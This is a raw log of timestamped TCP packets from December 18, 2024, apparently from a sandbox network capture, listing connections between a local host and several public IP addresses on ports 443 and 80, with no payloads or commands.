                                                                                        Dec 18, 2024 02:10:36.802906036 CET44349737104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:36.802926064 CET44349737104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:36.802987099 CET49737443192.168.2.16104.18.95.41
                                                                                        Dec 18, 2024 02:10:36.813209057 CET44349736104.18.94.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:36.813287020 CET49736443192.168.2.16104.18.94.41
                                                                                        Dec 18, 2024 02:10:36.815144062 CET44349737104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:36.815164089 CET44349737104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:36.815222979 CET49737443192.168.2.16104.18.95.41
                                                                                        Dec 18, 2024 02:10:36.815253019 CET44349737104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:36.815278053 CET49737443192.168.2.16104.18.95.41
                                                                                        Dec 18, 2024 02:10:36.817543983 CET44349736104.18.94.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:36.817608118 CET49736443192.168.2.16104.18.94.41
                                                                                        Dec 18, 2024 02:10:36.819447994 CET44349737104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:36.819519997 CET49737443192.168.2.16104.18.95.41
                                                                                        Dec 18, 2024 02:10:36.819531918 CET44349737104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:36.819591045 CET49737443192.168.2.16104.18.95.41
                                                                                        Dec 18, 2024 02:10:36.820729971 CET44349736104.18.94.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:36.820781946 CET49736443192.168.2.16104.18.94.41
                                                                                        Dec 18, 2024 02:10:36.820789099 CET44349736104.18.94.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:36.820811987 CET44349736104.18.94.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:36.820871115 CET49736443192.168.2.16104.18.94.41
                                                                                        Dec 18, 2024 02:10:36.820884943 CET44349736104.18.94.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:36.820894003 CET49736443192.168.2.16104.18.94.41
                                                                                        Dec 18, 2024 02:10:36.820894003 CET49736443192.168.2.16104.18.94.41
                                                                                        Dec 18, 2024 02:10:36.820930004 CET49736443192.168.2.16104.18.94.41
                                                                                        Dec 18, 2024 02:10:36.827491045 CET44349737104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:36.827507973 CET44349737104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:36.827563047 CET49737443192.168.2.16104.18.95.41
                                                                                        Dec 18, 2024 02:10:36.835293055 CET44349737104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:36.835377932 CET49737443192.168.2.16104.18.95.41
                                                                                        Dec 18, 2024 02:10:36.849076986 CET44349737104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:36.849164963 CET49737443192.168.2.16104.18.95.41
                                                                                        Dec 18, 2024 02:10:36.850543022 CET44349737104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:36.850614071 CET49737443192.168.2.16104.18.95.41
                                                                                        Dec 18, 2024 02:10:36.855482101 CET44349737104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:36.855576038 CET49737443192.168.2.16104.18.95.41
                                                                                        Dec 18, 2024 02:10:36.860604048 CET44349737104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:36.860691071 CET49737443192.168.2.16104.18.95.41
                                                                                        Dec 18, 2024 02:10:36.867717981 CET44349737104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:36.867793083 CET49737443192.168.2.16104.18.95.41
                                                                                        Dec 18, 2024 02:10:36.875586987 CET44349737104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:36.875674009 CET49737443192.168.2.16104.18.95.41
                                                                                        Dec 18, 2024 02:10:36.881720066 CET44349737104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:36.881798983 CET49737443192.168.2.16104.18.95.41
                                                                                        Dec 18, 2024 02:10:36.973714113 CET44349737104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:36.973803997 CET49737443192.168.2.16104.18.95.41
                                                                                        Dec 18, 2024 02:10:36.983577967 CET44349737104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:36.983653069 CET49737443192.168.2.16104.18.95.41
                                                                                        Dec 18, 2024 02:10:36.989988089 CET44349737104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:36.990063906 CET49737443192.168.2.16104.18.95.41
                                                                                        Dec 18, 2024 02:10:36.990673065 CET44349737104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:36.990745068 CET49737443192.168.2.16104.18.95.41
                                                                                        Dec 18, 2024 02:10:36.993676901 CET44349737104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:36.993746996 CET49737443192.168.2.16104.18.95.41
                                                                                        Dec 18, 2024 02:10:36.996731043 CET44349737104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:36.996807098 CET49737443192.168.2.16104.18.95.41
                                                                                        Dec 18, 2024 02:10:37.002370119 CET44349737104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:37.002459049 CET49737443192.168.2.16104.18.95.41
                                                                                        Dec 18, 2024 02:10:37.007850885 CET44349737104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:37.007939100 CET49737443192.168.2.16104.18.95.41
                                                                                        Dec 18, 2024 02:10:37.012912989 CET44349737104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:37.012988091 CET49737443192.168.2.16104.18.95.41
                                                                                        Dec 18, 2024 02:10:37.015661001 CET44349737104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:37.015738010 CET49737443192.168.2.16104.18.95.41
                                                                                        Dec 18, 2024 02:10:37.020932913 CET44349737104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:37.021012068 CET49737443192.168.2.16104.18.95.41
                                                                                        Dec 18, 2024 02:10:37.025949955 CET44349737104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:37.026051044 CET49737443192.168.2.16104.18.95.41
                                                                                        Dec 18, 2024 02:10:37.026066065 CET44349737104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:37.026174068 CET44349737104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:37.026240110 CET49737443192.168.2.16104.18.95.41
                                                                                        Dec 18, 2024 02:10:37.026282072 CET49737443192.168.2.16104.18.95.41
                                                                                        Dec 18, 2024 02:10:37.026310921 CET44349737104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:37.028820992 CET49740443192.168.2.16104.18.94.41
                                                                                        Dec 18, 2024 02:10:37.028862000 CET44349740104.18.94.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:37.028943062 CET49740443192.168.2.16104.18.94.41
                                                                                        Dec 18, 2024 02:10:37.029159069 CET49740443192.168.2.16104.18.94.41
                                                                                        Dec 18, 2024 02:10:37.029170036 CET44349740104.18.94.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:37.392628908 CET49741443192.168.2.16104.18.95.41
                                                                                        Dec 18, 2024 02:10:37.392673969 CET44349741104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:37.392749071 CET49741443192.168.2.16104.18.95.41
                                                                                        Dec 18, 2024 02:10:37.392946959 CET49741443192.168.2.16104.18.95.41
                                                                                        Dec 18, 2024 02:10:37.392962933 CET44349741104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:37.953898907 CET4434973935.190.80.1192.168.2.16
                                                                                        Dec 18, 2024 02:10:37.954210043 CET49739443192.168.2.1635.190.80.1
                                                                                        Dec 18, 2024 02:10:37.954229116 CET4434973935.190.80.1192.168.2.16
                                                                                        Dec 18, 2024 02:10:37.954711914 CET4434973935.190.80.1192.168.2.16
                                                                                        Dec 18, 2024 02:10:37.955005884 CET49739443192.168.2.1635.190.80.1
                                                                                        Dec 18, 2024 02:10:37.955082893 CET4434973935.190.80.1192.168.2.16
                                                                                        Dec 18, 2024 02:10:37.955178022 CET49739443192.168.2.1635.190.80.1
                                                                                        Dec 18, 2024 02:10:37.995326996 CET4434973935.190.80.1192.168.2.16
                                                                                        Dec 18, 2024 02:10:38.261924028 CET44349740104.18.94.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:38.262217045 CET49740443192.168.2.16104.18.94.41
                                                                                        Dec 18, 2024 02:10:38.262238026 CET44349740104.18.94.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:38.262692928 CET44349740104.18.94.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:38.263032913 CET49740443192.168.2.16104.18.94.41
                                                                                        Dec 18, 2024 02:10:38.263125896 CET44349740104.18.94.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:38.263174057 CET49740443192.168.2.16104.18.94.41
                                                                                        Dec 18, 2024 02:10:38.307327032 CET44349740104.18.94.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:38.314081907 CET49740443192.168.2.16104.18.94.41
                                                                                        Dec 18, 2024 02:10:38.417536974 CET4434973935.190.80.1192.168.2.16
                                                                                        Dec 18, 2024 02:10:38.417723894 CET4434973935.190.80.1192.168.2.16
                                                                                        Dec 18, 2024 02:10:38.417778969 CET49739443192.168.2.1635.190.80.1
                                                                                        Dec 18, 2024 02:10:38.417877913 CET49739443192.168.2.1635.190.80.1
                                                                                        Dec 18, 2024 02:10:38.417892933 CET4434973935.190.80.1192.168.2.16
                                                                                        Dec 18, 2024 02:10:38.612195015 CET44349741104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:38.612483978 CET49741443192.168.2.16104.18.95.41
                                                                                        Dec 18, 2024 02:10:38.612509966 CET44349741104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:38.612973928 CET44349741104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:38.613270044 CET49741443192.168.2.16104.18.95.41
                                                                                        Dec 18, 2024 02:10:38.613388062 CET44349741104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:38.613418102 CET49741443192.168.2.16104.18.95.41
                                                                                        Dec 18, 2024 02:10:38.655374050 CET44349741104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:38.664077997 CET49741443192.168.2.16104.18.95.41
                                                                                        Dec 18, 2024 02:10:38.707895041 CET44349740104.18.94.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:38.707984924 CET44349740104.18.94.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:38.708053112 CET49740443192.168.2.16104.18.94.41
                                                                                        Dec 18, 2024 02:10:38.708713055 CET49740443192.168.2.16104.18.94.41
                                                                                        Dec 18, 2024 02:10:38.708734035 CET44349740104.18.94.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:39.053536892 CET44349741104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:39.053630114 CET44349741104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:39.053682089 CET49741443192.168.2.16104.18.95.41
                                                                                        Dec 18, 2024 02:10:39.053693056 CET44349741104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:39.053705931 CET44349741104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:39.053755045 CET49741443192.168.2.16104.18.95.41
                                                                                        Dec 18, 2024 02:10:39.054332972 CET49741443192.168.2.16104.18.95.41
                                                                                        Dec 18, 2024 02:10:39.054341078 CET44349741104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:39.059225082 CET49742443192.168.2.16104.18.95.41
                                                                                        Dec 18, 2024 02:10:39.059242010 CET44349742104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:39.059334040 CET49742443192.168.2.16104.18.95.41
                                                                                        Dec 18, 2024 02:10:39.059547901 CET49742443192.168.2.16104.18.95.41
                                                                                        Dec 18, 2024 02:10:39.059557915 CET44349742104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:40.279191017 CET44349742104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:40.279520988 CET49742443192.168.2.16104.18.95.41
                                                                                        Dec 18, 2024 02:10:40.279601097 CET44349742104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:40.279959917 CET44349742104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:40.280282974 CET49742443192.168.2.16104.18.95.41
                                                                                        Dec 18, 2024 02:10:40.280358076 CET44349742104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:40.280426025 CET49742443192.168.2.16104.18.95.41
                                                                                        Dec 18, 2024 02:10:40.293092966 CET4970280192.168.2.1615.157.143.48
                                                                                        Dec 18, 2024 02:10:40.323339939 CET44349742104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:40.412548065 CET804970215.157.143.48192.168.2.16
                                                                                        Dec 18, 2024 02:10:40.721399069 CET44349742104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:40.721476078 CET44349742104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:40.721550941 CET49742443192.168.2.16104.18.95.41
                                                                                        Dec 18, 2024 02:10:40.724093914 CET49742443192.168.2.16104.18.95.41
                                                                                        Dec 18, 2024 02:10:40.724137068 CET44349742104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:40.737824917 CET49743443192.168.2.16104.18.94.41
                                                                                        Dec 18, 2024 02:10:40.737915039 CET44349743104.18.94.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:40.738017082 CET49743443192.168.2.16104.18.94.41
                                                                                        Dec 18, 2024 02:10:40.739689112 CET49743443192.168.2.16104.18.94.41
                                                                                        Dec 18, 2024 02:10:40.739727974 CET44349743104.18.94.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:41.153084993 CET49744443192.168.2.16104.18.95.41
                                                                                        Dec 18, 2024 02:10:41.153181076 CET44349744104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:41.153266907 CET49744443192.168.2.16104.18.95.41
                                                                                        Dec 18, 2024 02:10:41.153613091 CET49744443192.168.2.16104.18.95.41
                                                                                        Dec 18, 2024 02:10:41.153639078 CET44349744104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:41.457370996 CET4970180192.168.2.1615.157.143.48
                                                                                        Dec 18, 2024 02:10:41.576925039 CET804970115.157.143.48192.168.2.16
                                                                                        Dec 18, 2024 02:10:41.841108084 CET4970680192.168.2.16172.217.19.238
                                                                                        Dec 18, 2024 02:10:41.947102070 CET44349743104.18.94.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:41.947475910 CET49743443192.168.2.16104.18.94.41
                                                                                        Dec 18, 2024 02:10:41.947510004 CET44349743104.18.94.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:41.947805882 CET44349743104.18.94.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:41.948072910 CET49743443192.168.2.16104.18.94.41
                                                                                        Dec 18, 2024 02:10:41.948133945 CET44349743104.18.94.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:41.948188066 CET49743443192.168.2.16104.18.94.41
                                                                                        Dec 18, 2024 02:10:41.960566044 CET8049706172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:41.995333910 CET44349743104.18.94.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:42.379437923 CET44349744104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:42.379756927 CET49744443192.168.2.16104.18.95.41
                                                                                        Dec 18, 2024 02:10:42.379838943 CET44349744104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:42.380899906 CET44349744104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:42.381218910 CET49744443192.168.2.16104.18.95.41
                                                                                        Dec 18, 2024 02:10:42.381352901 CET49744443192.168.2.16104.18.95.41
                                                                                        Dec 18, 2024 02:10:42.381370068 CET44349744104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:42.381405115 CET44349744104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:42.381513119 CET49744443192.168.2.16104.18.95.41
                                                                                        Dec 18, 2024 02:10:42.381633043 CET44349744104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:42.381747007 CET49744443192.168.2.16104.18.95.41
                                                                                        Dec 18, 2024 02:10:42.381772995 CET44349744104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:42.396471977 CET44349743104.18.94.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:42.396543026 CET44349743104.18.94.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:42.396610975 CET49743443192.168.2.16104.18.94.41
                                                                                        Dec 18, 2024 02:10:42.397357941 CET49743443192.168.2.16104.18.94.41
                                                                                        Dec 18, 2024 02:10:42.397402048 CET44349743104.18.94.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:43.015302896 CET44349744104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:43.015588999 CET44349744104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:43.015652895 CET49744443192.168.2.16104.18.95.41
                                                                                        Dec 18, 2024 02:10:43.015675068 CET44349744104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:43.016269922 CET44349744104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:43.016318083 CET49744443192.168.2.16104.18.95.41
                                                                                        Dec 18, 2024 02:10:43.016333103 CET44349744104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:43.016988993 CET44349744104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:43.017052889 CET49744443192.168.2.16104.18.95.41
                                                                                        Dec 18, 2024 02:10:43.017067909 CET44349744104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:43.025979042 CET44349744104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:43.026557922 CET49744443192.168.2.16104.18.95.41
                                                                                        Dec 18, 2024 02:10:43.026572943 CET44349744104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:43.071238041 CET49744443192.168.2.16104.18.95.41
                                                                                        Dec 18, 2024 02:10:43.071252108 CET44349744104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:43.119107962 CET49744443192.168.2.16104.18.95.41
                                                                                        Dec 18, 2024 02:10:43.134742022 CET44349744104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:43.182127953 CET49744443192.168.2.16104.18.95.41
                                                                                        Dec 18, 2024 02:10:43.182188988 CET44349744104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:43.207564116 CET44349744104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:43.207643986 CET49744443192.168.2.16104.18.95.41
                                                                                        Dec 18, 2024 02:10:43.207660913 CET44349744104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:43.210256100 CET44349744104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:43.210318089 CET49744443192.168.2.16104.18.95.41
                                                                                        Dec 18, 2024 02:10:43.210330963 CET44349744104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:43.217856884 CET44349744104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:43.217924118 CET49744443192.168.2.16104.18.95.41
                                                                                        Dec 18, 2024 02:10:43.217938900 CET44349744104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:43.233032942 CET44349744104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:43.233144045 CET44349744104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:43.233275890 CET49744443192.168.2.16104.18.95.41
                                                                                        Dec 18, 2024 02:10:43.233342886 CET44349744104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:43.233382940 CET44349744104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:43.233412981 CET49744443192.168.2.16104.18.95.41
                                                                                        Dec 18, 2024 02:10:43.233444929 CET49744443192.168.2.16104.18.95.41
                                                                                        Dec 18, 2024 02:10:43.233486891 CET49744443192.168.2.16104.18.95.41
                                                                                        Dec 18, 2024 02:10:43.233519077 CET44349744104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:43.236960888 CET49745443192.168.2.16104.18.94.41
                                                                                        Dec 18, 2024 02:10:43.237001896 CET44349745104.18.94.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:43.237159014 CET49745443192.168.2.16104.18.94.41
                                                                                        Dec 18, 2024 02:10:43.237327099 CET49745443192.168.2.16104.18.94.41
                                                                                        Dec 18, 2024 02:10:43.237337112 CET44349745104.18.94.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:44.074141026 CET4970580192.168.2.16172.217.19.238
                                                                                        Dec 18, 2024 02:10:44.195132017 CET8049705172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:44.453063965 CET44349745104.18.94.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:44.453423977 CET49745443192.168.2.16104.18.94.41
                                                                                        Dec 18, 2024 02:10:44.453442097 CET44349745104.18.94.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:44.453782082 CET44349745104.18.94.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:44.454073906 CET49745443192.168.2.16104.18.94.41
                                                                                        Dec 18, 2024 02:10:44.454138994 CET44349745104.18.94.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:44.454206944 CET49745443192.168.2.16104.18.94.41
                                                                                        Dec 18, 2024 02:10:44.495342016 CET44349745104.18.94.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:44.895926952 CET44349745104.18.94.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:44.896480083 CET44349745104.18.94.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:44.896543026 CET49745443192.168.2.16104.18.94.41
                                                                                        Dec 18, 2024 02:10:44.896894932 CET49745443192.168.2.16104.18.94.41
                                                                                        Dec 18, 2024 02:10:44.896917105 CET44349745104.18.94.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:47.084146023 CET49747443192.168.2.16104.18.95.41
                                                                                        Dec 18, 2024 02:10:47.084188938 CET44349747104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:47.084305048 CET49747443192.168.2.16104.18.95.41
                                                                                        Dec 18, 2024 02:10:47.084537983 CET49747443192.168.2.16104.18.95.41
                                                                                        Dec 18, 2024 02:10:47.084552050 CET44349747104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:48.301383972 CET44349747104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:48.301728964 CET49747443192.168.2.16104.18.95.41
                                                                                        Dec 18, 2024 02:10:48.301759958 CET44349747104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:48.302850008 CET44349747104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:48.303375959 CET49747443192.168.2.16104.18.95.41
                                                                                        Dec 18, 2024 02:10:48.303473949 CET44349747104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:48.303586960 CET49747443192.168.2.16104.18.95.41
                                                                                        Dec 18, 2024 02:10:48.303659916 CET49747443192.168.2.16104.18.95.41
                                                                                        Dec 18, 2024 02:10:48.303689003 CET44349747104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:48.303776026 CET49747443192.168.2.16104.18.95.41
                                                                                        Dec 18, 2024 02:10:48.303803921 CET44349747104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:48.929477930 CET44349747104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:48.929665089 CET44349747104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:48.929760933 CET49747443192.168.2.16104.18.95.41
                                                                                        Dec 18, 2024 02:10:48.929801941 CET44349747104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:48.930077076 CET44349747104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:48.930139065 CET49747443192.168.2.16104.18.95.41
                                                                                        Dec 18, 2024 02:10:48.930156946 CET44349747104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:48.930293083 CET44349747104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:48.930346012 CET49747443192.168.2.16104.18.95.41
                                                                                        Dec 18, 2024 02:10:48.931221008 CET49747443192.168.2.16104.18.95.41
                                                                                        Dec 18, 2024 02:10:48.931252956 CET44349747104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:48.933990955 CET49748443192.168.2.16104.18.94.41
                                                                                        Dec 18, 2024 02:10:48.934035063 CET44349748104.18.94.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:48.934129000 CET49748443192.168.2.16104.18.94.41
                                                                                        Dec 18, 2024 02:10:48.934453964 CET49748443192.168.2.16104.18.94.41
                                                                                        Dec 18, 2024 02:10:48.934472084 CET44349748104.18.94.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:50.145049095 CET44349748104.18.94.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:50.145545959 CET49748443192.168.2.16104.18.94.41
                                                                                        Dec 18, 2024 02:10:50.145570993 CET44349748104.18.94.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:50.146084070 CET44349748104.18.94.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:50.146545887 CET49748443192.168.2.16104.18.94.41
                                                                                        Dec 18, 2024 02:10:50.146689892 CET44349748104.18.94.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:50.146761894 CET49748443192.168.2.16104.18.94.41
                                                                                        Dec 18, 2024 02:10:50.187335968 CET44349748104.18.94.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:50.192172050 CET49748443192.168.2.16104.18.94.41
                                                                                        Dec 18, 2024 02:10:50.594597101 CET44349748104.18.94.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:50.594718933 CET44349748104.18.94.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:50.594793081 CET49748443192.168.2.16104.18.94.41
                                                                                        Dec 18, 2024 02:10:50.595602036 CET49748443192.168.2.16104.18.94.41
                                                                                        Dec 18, 2024 02:10:50.595626116 CET44349748104.18.94.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:55.752048969 CET4970280192.168.2.1615.157.143.48
                                                                                        Dec 18, 2024 02:10:55.914357901 CET804970215.157.143.48192.168.2.16
                                                                                        Dec 18, 2024 02:10:55.914519072 CET4970280192.168.2.1615.157.143.48
                                                                                        Dec 18, 2024 02:10:56.456074953 CET804970115.157.143.48192.168.2.16
                                                                                        Dec 18, 2024 02:10:56.456160069 CET4970180192.168.2.1615.157.143.48
                                                                                        Dec 18, 2024 02:10:57.112433910 CET4970680192.168.2.16172.217.19.238
                                                                                        Dec 18, 2024 02:10:57.112500906 CET4970180192.168.2.1615.157.143.48
                                                                                        Dec 18, 2024 02:10:57.231901884 CET804970115.157.143.48192.168.2.16
                                                                                        Dec 18, 2024 02:10:57.232155085 CET8049706172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:57.232358932 CET4970680192.168.2.16172.217.19.238
                                                                                        Dec 18, 2024 02:10:57.355859041 CET49750443192.168.2.16104.21.32.1
                                                                                        Dec 18, 2024 02:10:57.355909109 CET44349750104.21.32.1192.168.2.16
                                                                                        Dec 18, 2024 02:10:57.356096983 CET49750443192.168.2.16104.21.32.1
                                                                                        Dec 18, 2024 02:10:57.356292009 CET49750443192.168.2.16104.21.32.1
                                                                                        Dec 18, 2024 02:10:57.356307030 CET44349750104.21.32.1192.168.2.16
                                                                                        Dec 18, 2024 02:10:58.320396900 CET49751443192.168.2.16142.250.181.132
                                                                                        Dec 18, 2024 02:10:58.320482016 CET44349751142.250.181.132192.168.2.16
                                                                                        Dec 18, 2024 02:10:58.320596933 CET49751443192.168.2.16142.250.181.132
                                                                                        Dec 18, 2024 02:10:58.321139097 CET49751443192.168.2.16142.250.181.132
                                                                                        Dec 18, 2024 02:10:58.321177006 CET44349751142.250.181.132192.168.2.16
                                                                                        Dec 18, 2024 02:10:58.566843033 CET44349750104.21.32.1192.168.2.16
                                                                                        Dec 18, 2024 02:10:58.567095995 CET49750443192.168.2.16104.21.32.1
                                                                                        Dec 18, 2024 02:10:58.567109108 CET44349750104.21.32.1192.168.2.16
                                                                                        Dec 18, 2024 02:10:58.568553925 CET44349750104.21.32.1192.168.2.16
                                                                                        Dec 18, 2024 02:10:58.568613052 CET49750443192.168.2.16104.21.32.1
                                                                                        Dec 18, 2024 02:10:58.569066048 CET49750443192.168.2.16104.21.32.1
                                                                                        Dec 18, 2024 02:10:58.569087029 CET49750443192.168.2.16104.21.32.1
                                                                                        Dec 18, 2024 02:10:58.569143057 CET44349750104.21.32.1192.168.2.16
                                                                                        Dec 18, 2024 02:10:58.569147110 CET49750443192.168.2.16104.21.32.1
                                                                                        Dec 18, 2024 02:10:58.569195032 CET49750443192.168.2.16104.21.32.1
                                                                                        Dec 18, 2024 02:10:58.569475889 CET49752443192.168.2.16104.21.32.1
                                                                                        Dec 18, 2024 02:10:58.569564104 CET44349752104.21.32.1192.168.2.16
                                                                                        Dec 18, 2024 02:10:58.569653034 CET49752443192.168.2.16104.21.32.1
                                                                                        Dec 18, 2024 02:10:58.569880962 CET49752443192.168.2.16104.21.32.1
                                                                                        Dec 18, 2024 02:10:58.569902897 CET44349752104.21.32.1192.168.2.16
                                                                                        Dec 18, 2024 02:10:59.788947105 CET44349752104.21.32.1192.168.2.16
                                                                                        Dec 18, 2024 02:10:59.789258003 CET49752443192.168.2.16104.21.32.1
